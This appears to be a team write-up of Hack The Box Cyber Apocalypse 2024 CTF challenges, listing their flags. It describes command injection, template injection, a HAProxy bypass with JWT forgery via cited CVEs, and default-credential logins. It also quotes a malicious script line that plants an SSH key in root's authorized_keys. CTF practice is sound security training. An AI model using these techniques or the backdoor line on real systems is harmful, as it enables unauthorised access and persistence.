Hackthebox CyberApocalypse 2024 CTF Writeup

Hello everybody reading this :), This is a writeup on how we solved some of the challenges hosted in Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale". The categories are ranging from Web, Misc, Reverse Engineering, PWN, Forensics and Cryptography.

NOTE : The challenges were solved by me, and @alienX and the other's who were in the team :)

Web Challenges

Flag Command (Very Easy - 300 points)

Description

provided the challenge description above, I spawn the docker instance and start solving this challenge!

Solution

I open the app on the web and intercept the requests using burpsuite I was able to capture some interesting requests after playing around with the web by inputting the command "start"

From burpsuite I was able to retrieve an endpoint dumping all commands to be executed on /api/options

And as seen there is a command Blip-blop, in a pickle with a hiccup! Shmiggity-shmack, I proceed by sending that as a command and I received the response with the flag

​​​​FLAG : HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}

KORP Terminal (Very Easy - 300 points)

Description

Solution

I overthinked a bit on this one, but spawning the docker and launching it on web we are responded with a login page.

Using the credentials , admin:password123 I was able to get the flag:

​​​​FLAG : HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}

TimeKORP

Description

Solution

Provided with the source codes we are required to analyze the source code and get the flag from the web app. Opening the web app we first are responded with an output of time. and there is a button on top left saying What's the date?:

Clicking on that the URI changes a bit to something interesting:

Smells like command injection! Reviewing the source code I could see the vulnerable point is ?format= and we can perform command injection:

Now we can easily escape this by running something such as ;' [command-here]'

​​​​FLAG : HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}

Labrynth Linguistic (Easy - 300 points)

Description

This was an interesting challenge, as I faced a technology which is rarely seen in environments. First opening the web application I am visiting a site asking for input and has a weird text written below:

Providing a sample word, it gives a weird text as a response and that's voxalith the translated language. I head back to reviewing the source code:

Then I discovered something interesting as it renders my input now the template engine used is Velocity which is also vulnerable to SSTI in the case used as in the source code seen above. After reading multiple articles I came accross a working payload, running it I was able to get the flag:

​​​​FLAG : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}

References

Apache Velocity Server Side Template Injection

LockTalk (Medium - 300 points)

Description

Solution

Alright we are provided with a source code available for download, and spawning the instance runs the web app on a certain host. The web application is more of an API which does about 3 features:

Trying to generate a JWT Token gives us an unauthorized error:

Heading back to the source code to review what is going on, we can see that this route is available to guest user:

But what's making it say 403??? Well Reading the haproxy.cfg file we get our answers:

There are two ways to bypass this, the first way is by url encoding the path /api/v1/get_ticket and the second way is by exploiting CVE-2023-45539. Let's take a look on both ways.

URL ENCODING

CVE-2023-45539

By adding the # at the end of our URI will bypass the haproxy configuration rule and provide us with the token. Now the token is using the algorithm PS256. After a few minutes of google-fu, there is a vulnerability of CVE-2022-39227 which allows an attacker to forge claims from a pregenrated token using the exploit https://github.com/user0x1337/CVE-2022-39227 I was able to generate the token and use it to get the flag:

​​​​FLAG : HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}

Reverse Engineering

BoxCutter (Very Easy - 300 points)

Description

Solution

This was quick, less than a minute I had the flag. Downloading the binary I first try to trace every call as the binary is executed and I was able to get the flag from the output as I was analyzing:

​​​​FLAG : HTB{tr4c1ng_th3_c4ll5}

PackedAway (Very Easy - 300 points)

Description

Solution

The name of the challenge itself hints us on how to solve it. First I try to check if the file is packed by checking for suspicious strings:

As seen above, the binary is packed using UPX I now proceed to decompress it so as I retrieve the original binary:

Using rabin2 I was able to fetch all readable strings and among them was the flag:

​​​​FLAG : HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}

LootStash (Very Easy - 300 points)

Description

Solution

Given that the flag is on the stack it was easy for me to actually get the flag after trying to fetch all readable string and grep the word "HTB" out of it:

​​​​FLAG : HTB{n33dl3_in_a_l00t_stack}

Crushing (Easy - 300 points)

Description

Forensics

An Unusual Sighting (Very Easy - 300 points)

Description

Solution

start an instance and solve the interact with the docker instance to solve the challenge

FLAG: HTB{B3sT_0f_luck_1n_th3_Fr4y!!}

Urgent (Very Easy - 300 points)

Description

Solution

Another forensic easy challenge lets lake it down easy forensic LOL

After unziping the file found inside a file encoded with base64

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/urgent]
└─$ ls
'Urgent Faction Recruitment Opportunity - Join Forces Against KORP™ Tyranny.eml'   forensics_urgent.zip

found this interesting encoded text

and decided to decode it using cyberchef as follows

And if u take a deep look u will see a javascript encoded text, i went direct and coped it and try to decode it again using cyberchef again and guess what b00m

FLAG:HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT}

It Has Begun

Description

Solution

it another easy challenge this one i solved it very fast course it was easy men, lets get the flag

downloaded the file

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun]
└─$ mv ~/Downloads/forensics_it_has_begun\(2\).zip .
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun]
└─$ unzip forensics_it_has_begun\(2\).zip 
Archive:  forensics_it_has_begun(2).zip
  inflating: script.sh 

we got a bash script, lets read it now

now i looked closed with the script and undertood what it does but within it there is some strange encoded string lets decode them now

echo "ssh-rsa AAAAB4NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D7s4J0L7XV2kep0rNzgY1S1IdE8HDAf7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsM$
+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B user@tS_u0y_ll1w{BTH" >> /root/.ssh/authorized_keys 

The user section was very strange for me 'tS_u0y_ll1w{BTH' i went and reverse it

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF]
└─$ flag: HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}

PWN

Tutorial

Description

Solution

lets interact with an instance we have here via netcat command from our terminal.

The idea about this challenge was interge overflow, we were give a sample binary written in C language so as we can see how we can answer the docker instance direct, lets not waste time with this challenge.

flag:HTB{gg_3z_th4nk5_f0r_th3_tut0r14l}

reference:https://en.wikipedia.org/wiki/Integer_overflow
reference:https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/

MISC

Character (Very Easy - 300 points)

Description

Solution

as usually, spawn the docker instance, after starting it we are give a port and ip address lets create via terminal now.

command: nc 94.237.54.161 47922

And as you can see below that we have been give a instance that once we input the index it give out the characters of the flag as all we know that the flag starts with HTB{}

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF]
└─$ nc 94.237.54.161 47922
Which character (index) of the flag do you want? Enter an index: 0
Character at Index 0: H
Which character (index) of the flag do you want? Enter an index: 1
Character at Index 1: T
Which character (index) of the flag do you want? Enter an index: 2
Character at Index 2: B
Which character (index) of the flag do you want? Enter an index: 3
Character at Index 3: {
Which character (index) of the flag do you want? Enter an index: 
Character at Index 97: l
Which character (index) of the flag do you want? Enter an index: 98
Character at Index 98: 0
Which character (index) of the flag do you want? Enter an index: 99
Character at Index 99: n
Which character (index) of the flag do you want? Enter an index: 10
Character at Index 10: s
Which character (index) of the flag do you want? Enter an index: 100
Character at Index 100: g
Which character (index) of the flag do you want? Enter an index: 101
Character at Index 101: !
Which character (index) of the flag do you want? Enter an index: 102
Character at Index 102: !
Which character (index) of the flag do you want? Enter an index: 103
Character at Index 103: }
Which character (index) of the flag do you want? Enter an index: 

if you continue u will notce that the flag is very long so i did this manually at first where u can just write the script to automate this by grepping after every index the flag characters

TOTAL NUMBER OF CHARACTERS (0-104)

flag: HTB{tH15_1s_4_r3aLly_l0nG_fL4g_i_h0p3_f0r_y0Ur_s4k3_tH4t_y0U_sCr1pTEd_tH1s_oR_els3_iT_t0oK_qU1t3_l0ng!!}

CRYPTGRAPHY

makeshif

Description

Solution

its another easy challenge from cryptography lets download the file first and see what we can do here.

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make]
└─$ unzip crypto_makeshift.zip 
Archive:  crypto_makeshift.zip
   creating: challenge/
  inflating: challenge/source.py     
 extracting: challenge/output.txt    
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make]
└─$ cd challenge 
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ ls
output.txt  source.py
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat output.txt          
!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat source.py 
from secret import FLAG

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)

we have been given a reversed cipher so we need to recover it, it very easy course we can use the source code being given to recover the flag like this

first of all am going to edit the source file coz its not possible to run with the imported 'secret' coz its now not available

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ nano source.py        
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat source.py   
FLAG = "!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB"

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ python3 source.py      
HTB{4_b3tTeR_w3apOn_i5_n3edeD!?!}                              

Dynastic

Description

Solution

FLAG

HTB{DID_YOU_KNOW_ABOUT_THE_TRITHEMIUS_CIPHER?!_IT_IS_SIMILAR_TO_CAESAR_CIPHER}